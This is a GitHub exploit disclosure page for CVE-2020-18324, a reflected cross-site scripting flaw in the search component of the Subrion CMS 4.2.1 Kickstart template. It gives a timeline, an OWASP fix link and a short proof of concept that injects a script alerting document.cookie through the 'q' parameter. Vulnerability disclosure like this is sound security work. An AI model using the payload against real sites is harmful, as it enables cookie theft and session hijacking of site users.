Skip to content

hamm0nz/CVE-2020-18324

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Subrion CMS 4.2.1 – Reflected XSS vulnerability in Kickstart template

Description

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

The Reflected Cross-site Scripting vulnerability was discovered in the "Kickstart" web application template of the Subrion CMS v.4.2.1 via the "search" component, which allows a remote attacker to inject arbitrary JavaScript.

Date: 22-02-2022
Software Link: https://subrion.org
Exploit Author: HaMM0nz
CVE: CVE-2020-18324
Category: Web Application

Proof of Concept

  1. Navigate to Subrion Kickstart template
  2. Inject <script>alert(document.cookie);</script> into “q” parameter, in PoC exploit will be https://localhost/search/?q=<script>alert(document.cookie);</script>

Timeline

Discovery and report : 24 June 2019
CVE ID was assigned : 11 Aug 2021
Public : 22 February 2022

Solution

Consider complying to the OWASP's XSS prevention guidelines. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

About

Exploit PoC for CVE-2020-18324

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published